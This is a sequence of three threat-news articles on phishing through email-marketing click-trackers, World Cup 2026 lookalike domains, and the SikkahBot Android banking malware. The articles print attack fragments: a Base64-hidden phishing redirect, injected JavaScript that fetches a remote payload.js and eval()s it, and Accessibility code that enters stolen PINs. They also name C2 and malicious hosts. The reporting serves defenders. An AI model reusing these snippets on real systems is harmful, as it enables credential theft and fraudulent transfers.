Cybercriminals are increasingly exploiting legitimate email marketing platforms to launch sophisticated phishing campaigns, leveraging the trusted reputation of these services to bypass security filters and deceive victims.

This emerging threat vector represents a significant evolution in phishing tactics, where attackers abuse click-tracking domains and URL redirection services provided by established email marketing companies to mask their malicious intentions.

The campaigns utilize platforms such as Klaviyo’s ‘klclick3.com’ and Drip Global’s ‘dripemail2.com’ domains, which are legitimate click-tracking services designed to monitor user interactions with marketing emails.

By routing malicious URLs through these trusted domains, attackers create a veneer of legitimacy that helps their phishing emails evade detection by traditional security systems.

The technique is particularly insidious because it exploits the inherent trust users place in recognized marketing platforms.

Recent analysis reveals that these campaigns often employ sophisticated lures, including fake voicemail notifications, DocuSign document requests, and payment-related messages.

The attackers demonstrate remarkable adaptability, combining traditional phishing techniques with modern evasion methods including CAPTCHA verification, compromised domains, and abuse of cloud services like Amazon Web Services and Cloudflare.

Trustwave researchers identified a significant increase in phishing URLs containing familiar patterns and similar phishing templates, noting the resurgence in abuse of email marketing platforms alongside widespread use of URL redirectors.

Their PageML system, which combines machine learning components with URL intelligence frameworks, has been instrumental in detecting these evolving threats in real-time.

Advanced Redirection and Evasion Techniques

The technical sophistication of these campaigns is evident in their multi-layered redirection mechanisms.

In one documented case, attackers used a Base64-encoded redirection scheme where the initial phishing URL contained encoded strings that, when decoded, revealed the actual malicious destination.

The source code analysis showed:-

ucis.RedirectUrl = "aHR0cHM6Ly9vZmZpY21hc2RpbmRvbW1qZW9haWV1bnQuZXN6a3FlaHJoeXpkdXF2d3JiZ3h1dWd4YXF1bXJtLmlwLWRkbnMuY29tL2YvNFNTd08yUU5LQ3B5MWdDeEtzX0w=";
ucis.RedirectUrl = atob(ucis.RedirectUrl); // decode to real URL

Additionally, attackers implement anti-analysis measures by disabling right-click functionality through JavaScript event listeners:-

addEventListener("contextmenu", function(e) {
    e.preventDefault();
});

The campaigns also employ chameleon phishing techniques, dynamically fetching company information and logos using services like Clearbit to create personalized phishing pages that appear legitimate to specific victims.

These pages often integrate Cloudflare Turnstile for human verification, adding another layer of evasion while appearing to provide security measures.

The abuse of legitimate infrastructure creates significant challenges for cybersecurity teams, as traditional blacklisting approaches become ineffective when malicious content is hosted on trusted domains.

This trend underscores the need for advanced behavioral analysis and machine learning-based detection systems capable of identifying malicious intent regardless of the hosting infrastructure’s reputation.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Abuse Legitimate Email Marketing Platforms to Disguise Malicious Links appeared first on Cyber Security News.

Security researchers have observed an unprecedented surge in domain registrations in recent months, closely tied to the upcoming 2026 FIFA World Cup tournament.

These domains, often masquerading as legitimate ticketing portals, merchandise outlets, or live-stream platforms, serve as precursors to a multifaceted cyber campaign designed to harvest credentials, distribute malware, and siphon financial data.

Attackers are leveraging the high-profile nature of the event, registering deceptive domains up to eighteen months in advance to avoid detection and establish credibility among unsuspecting fans.

As interest in match schedules and ticket availability peaks, visitors are lured into interacting with these fraudulent websites, unknowingly initiating the infection chain.

BeforeAI analysts identified a cluster of over 498 suspicious domains containing terms such as “fifa,” “worldcup,” and host city names, with registrations peaking in August 2025.

These domains are distributed across top registrars including GoDaddy.com and Namecheap, as well as low-friction TLDs like .online and .shop.

In many cases, threat actors repurpose aged domains previously registered for other sporting events, further complicating attribution and takedown efforts.

The registration of domains anchored to future tournaments in 2030 and 2034 highlights the long-term strategy employed by these cybercriminal groups.

The impact of this preparatory activity extends beyond simple phishing attempts. Victims who input personal details on these sites may be redirected to payload delivery servers hosting trojan droppers capable of evading signature-based detection.

Initial reconnaissance indicates that the malware leverages polymorphic loaders to modify its decryption routines on each execution, thwarting static analysis.

Command-and-control (C2) communications occur over HTTPS to blend with legitimate traffic, while fallback DNS tunnels allow for data exfiltration even if primary channels are disrupted.

Infection Mechanism and Persistence Tactics

Delving deeper into the infection mechanism reveals a staged process beginning with a malicious JavaScript injected into compromised landing pages.

When unsuspecting users visit URLs like watchfootball-live.com, the script checks the browser environment and delivers a second-stage payload only if specific conditions are met, such as running outdated browser plugins. This selective delivery reduces exposure to sandbox analysis.

The following snippet demonstrates how the script computes a time-based hash to retrieve the payload URL:-

(function() {
    const key = "WorldCup2026";
    const now = Math.floor(Date.now() / 3600000);
    const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
    fetch(`https://${hash}.cdn-delivery.net/payload.js`)
        .then(response => response. Text())
        .then(eval);
})();

Once executed, the payload writes a small loader to the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence.

It then downloads additional modules disguised as harmless image files, which are in fact encrypted executables unpacked in memory and injected into legitimate processes such as svchost.exe.

By employing reflective DLL injection, the malware avoids dropping components to disk, significantly reducing forensic footprints.

The sophisticated use of aged domains, combined with polymorphic and in-memory techniques, underscores the evolving threat landscape as the world gears up for the 2026 FIFA World Cup.

Continuous monitoring and proactive domain blacklisting will be crucial to safeguard fans and organizations from this looming cyberattack.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Registering Domains to Launch Cyberattack Targeting 2026 FIFA World Cup Tournament appeared first on Cyber Security News.

A sophisticated Android malware campaign has emerged in recent months, targeting students in Bangladesh by masquerading as legitimate scholarship applications.

Disguised under the guise of the Bangladesh Education Board, these fraudulent apps promise financial aid and entice unsuspecting users to download APKs from shortened URLs.

Once installed, the malware covertly harvests personal and financial information, intercepts SMS messages, and even abuses device permissions to conduct unauthorized banking transactions.

Its low detection rate on VirusTotal suggests that threat actors behind this campaign have invested considerable effort in evading traditional security controls.

Initial distribution relies heavily on smishing campaigns, where students receive SMS links that redirect them to malicious APK hosting sites such as appsloads.top and downloadapp.website.

The lure of a scholarship application, complete with official logos and academic terminology, lowers users’ guard and increases the likelihood of installation.

After installation, the app prompts victims to sign in via Google or Facebook and enter sensitive details including full name, department, and institute affiliation.

Cyble analysts noted that this early stage of social engineering is critical to building trust and collecting the information required for subsequent attacks.

Following credential harvesting, the malware advances to request high-risk permissions, including Accessibility Service, SMS access, overlay, and call management rights.

Researchers identified that once these permissions are granted, the app registers an SMSBroadcastReceiver to capture incoming texts containing keywords associated with major Bangladeshi banks (e.g., “bkash,” “NAGAD,” “MYGP”) and specific USSD service codes.

The intercepted messages are then forwarded to a Firebase-hosted command and control (C2) server, enabling remote attackers to coordinate further malicious activities.

Upon successful permission escalation, SikkahBot shifts into its most dangerous phase: automated banking transactions.

Exploiting the Accessibility Service, the malware continuously monitors foreground applications and, when detecting targeted banking apps such as bKash, Nagad, or Dutch-Bangla Bank, retrieves one-time PINs from the C2 server.

A brief code snippet illustrates the process of injecting user input:-

AccessibilityNodeInfo node = rootNode.findFocus(AccessibilityNodeInfo.FOCUS_INPUT);
Bundle args = new Bundle();
args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, pin);
node.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args);
node.performAction(AccessibilityNodeInfo.ACTION_CLICK);

This routine allows automated login without user interaction.

If banking apps are inactive, the malware executes USSD codes received from the server, filling input fields and invoking buttons labeled “SEND” or “OK” within the USSD dialog to initiate fund transfers without an active internet connection (see Figure 8 – Dialing USSD code).

Infection Mechanism and Persistence

SikkahBot’s infection mechanism is a blend of social engineering and stealthy permission abuse.

After the initial APK installation, the malware copies its APK file to a hidden directory and registers as a device administrator, ensuring that uninstallation attempts prompt administrative lock notifications.

It injects receiver components into the AndroidManifest.xml to persist across reboots, and periodically contacts the Firebase C2 endpoint at https://update-app-sujon-default-rtdb.firebaseio.com to fetch new modules.

By abusing the Accessibility Service, the malware can re-enable its own services if they are disabled by security-conscious users.

The combination of persistent device administrator rights, manifest-declared receivers, and periodic C2 polling makes SikkahBot exceptionally resilient against removal and detection.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Beware of Fraudulent Scholarship Apps Attacking Students in Defarud Campaign appeared first on Cyber Security News.